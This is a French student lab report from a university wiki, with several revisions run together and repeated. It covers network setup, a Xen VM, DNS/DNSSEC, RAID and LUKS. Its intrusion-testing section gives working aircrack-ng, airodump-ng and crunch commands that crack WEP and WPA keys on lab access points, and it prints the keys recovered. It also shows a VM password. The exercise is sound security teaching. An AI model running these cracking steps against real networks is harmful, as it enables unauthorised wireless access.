enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57769TP sysres IMA5 2021/2022 G72022-01-10T17:27:16Z<p>Avercaem : /* Tests d’intrusion */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57732TP sysres IMA5 2021/2022 G72022-01-10T16:28:43Z<p>Avercaem : /* Chiffrement de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
